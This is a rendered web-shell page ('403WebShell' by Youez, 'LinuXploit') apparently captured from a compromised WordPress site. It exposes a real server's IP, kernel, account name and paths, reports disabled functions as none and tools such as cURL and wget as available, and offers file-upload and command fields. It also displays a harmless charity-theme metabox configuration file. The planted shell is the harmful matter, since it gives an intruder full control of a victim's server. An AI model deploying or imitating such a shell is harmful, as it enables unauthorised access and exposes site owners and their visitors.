Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.117.151.198
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/tacafoundation.org/wp-content/plugins/charite-core/inc/admin/metabox/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/tacafoundation.org/wp-content/plugins/charite-core/inc/admin/metabox/service.php
<?php
/*
 * Theme Metabox Options
 * @package charite
 * @since 1.0.0
 * */

if (!defined('ABSPATH')) {
    exit(); // exit if access directly
}

if (class_exists('CSF')) {


    /*-------------------------------------
	   Page Options
   -------------------------------------*/
    $charite_group_meta = 'charite_service_meta';
    CSF::createMetabox($charite_group_meta, array(
        'title'     => esc_html__('Service Meta', 'charite-core'),
        'post_type' => 'service',
    ));

    //
    // Create a section
    CSF::createSection($charite_group_meta, array(
        'title'  => esc_html__('Service Info', 'charite-core'),
        'fields' => array(
            array(
                'id'    => 'icon',
                'type'  => 'icon',
                'title' => esc_html__('Service Icon', 'charite-core'),
            ),
            array(
                'id'         => 'features_section_title',
                'title'      => esc_html__('Features Section Title', 'charite-core'),
                'type'       => 'text',
                'default'    => esc_html__('My Experiences', 'charite-core'),
            ),
            array(
                'id'         => 'features',
                'type'       => 'repeater',
                'title'      => esc_html__('Features', 'charite-core'),
                'fields'     => array(
                    array(
                        'id'    => 'icon',
                        'type'  => 'icon',
                        'title' => esc_html__('Icon', 'charite-core'),
                    ),
                    array(
                        'id'    => 'title',
                        'type'  => 'text',
                        'title' => esc_html__('Title', 'charite-core'),
                        'default' => esc_html__('Flexible Solutions', 'charite-core')
                    ),
                    array(
                        'id'    => 'content',
                        'type'  => 'text',
                        'title' => esc_html__('Content', 'charite-core'),
                        'default' => esc_html__('Maecenas tempus, tellus eget condime honcus sem quam semper', 'charite-core')
                    ),
                ),
            ),

        )
    ));

    //
    // FAQ
    CSF::createSection($charite_group_meta, array(
        'title'  => esc_html__('Faq', 'charite-core'),
        'fields' => array(
            array(
                'type'    => 'subheading',
                'content' => esc_html__('FAQ', 'charite-core'),
            ),
            array(
                'id'         => 'faq_header',
                'title'      => esc_html__(' FAQ Header', 'charite-core'),
                'type'       => 'text',
                'default'    => esc_html__('More information', 'charite-core'),
            ),
            array(
                'id'         => 'faq_item',
                'type'       => 'repeater',
                'title'      => esc_html__('FAQ', 'charite-core'),
                'fields'     => array(
                    array(
                        'id'    => 'question',
                        'type'  => 'text',
                        'title' => esc_html__('Question', 'charite-core'),
                        'default' => esc_html__('Default Title', 'charite-core')
                    ),
                    array(
                        'id'    => 'answer',
                        'type'  => 'textarea',
                        'title' => esc_html__('Default Answer', 'charite-core'),
                        'default' => esc_html__('Default Answer', 'charite-core')
                    ),

                ),
            ),
            array(
                'id'    => 'image',
                'type'  => 'upload',
                'title' => esc_html__('Image', 'charite-core'),
            ),

        )
    ));
}//endif

Youez - 2016 - github.com/yon3zu
LinuXploit